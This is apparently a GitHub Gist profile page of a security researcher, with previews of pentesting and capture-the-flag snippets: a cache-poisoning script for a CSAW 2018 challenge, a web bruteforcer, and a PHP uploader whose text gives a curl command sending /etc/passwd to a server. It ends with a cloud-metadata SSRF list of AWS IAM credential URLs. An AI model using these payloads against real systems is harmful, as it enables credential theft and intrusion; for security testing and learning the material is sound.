👋
Hey! Wassup 😃 Let's talk security 😎

Aseem Shrey LuD1161

@LuD1161
LuD1161 / WAHH_Task_Checklist.md
Created July 19, 2018 16:12 — forked from jhaddix/Testing_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
@LuD1161
LuD1161 / cors_and_clickjacking_checker.html
Created July 24, 2018 12:24
cors_and_clickjacking_checker
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<title>CORS and Clickjacking checker</title>
<style>
body {
    font-family: Arial;
    color: white;
}
"""
A horrible script, however gets things done ;)
USE CASE : If file encrypted with simple xor
Enter expected key, can be file format's hex
It will automatically find the key based on that header
And write out a new file out of it
"""
@LuD1161
LuD1161 / .myprompt.sh
Last active February 6, 2019 20:54
My Bash Prompt
#!/bin/bash
#=========================================================
#Terminal Color Codes
#=========================================================
WHITE='\[\033[1;37m\]'
LIGHTGRAY='\[\033[0;37m\]'
GRAY='\[\033[1;30m\]'
BLACK='\[\033[0;30m\]'
RED='\[\033[0;31m\]'
@LuD1161
LuD1161 / poison.py
Created September 17, 2018 10:33
poison.py - Hacker Movie Club ( Web challenge ) CSAW 2018
from time import sleep
import requests
import webbrowser
X_Forwarded_Host = 'my_server'
while True:
    # Re-request the CDN script with a spoofed X-Forwarded-Host and print the response headers
    resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host})
    print(resp.headers)
    sleep(0.5)
@LuD1161
LuD1161 / app.js
Created September 17, 2018 11:18
Files for Hacker Movie Club Challenge - CSAW Quals 2018
var token = null;
Promise.all([
    fetch('/api/movies').then(r=>r.json()),
    fetch(`//3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/main.mst`).then(r=>r.text()),
    new Promise((resolve) => {
        if (window.loaded_recapcha === true)
            return resolve();
        window.loaded_recapcha = resolve;
    }),
@LuD1161
LuD1161 / upload.php
Last active September 30, 2018 17:44
Uploader script
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<h1> Make sure you've set the right permissions for your "uploads" directory i.e. chmod -R 777 uploads </h1>
<h2>For curl command : curl -F "uploaded_file=@/etc/passwd" http://server_ip/path_to_this_script/upload.php </h2>
<form enctype="multipart/form-data" method="POST">
<p>Upload your file</p>
@LuD1161
LuD1161 / multiple-targets.sh
Created October 10, 2018 16:57
Multiple Targets for the master script
#!/bin/bash
if [ -z "$1" ]
then
    echo "Target file not specified"
    echo "Usage : ./multiple-targets.sh file_name"
    exit 1
fi
for target in $(cat $1);
@LuD1161
LuD1161 / bruteforcer.py
Created January 5, 2019 15:32
Bruteforcer for web requests
import asyncio
from aiohttp import ClientSession
import json
headers = {
    'Content-Type': 'application/json',
    'Charset': 'UTF-8',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
}  # Change the headers accordingly
@LuD1161
LuD1161 / cloud_metadata.txt
Created January 11, 2019 08:59 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname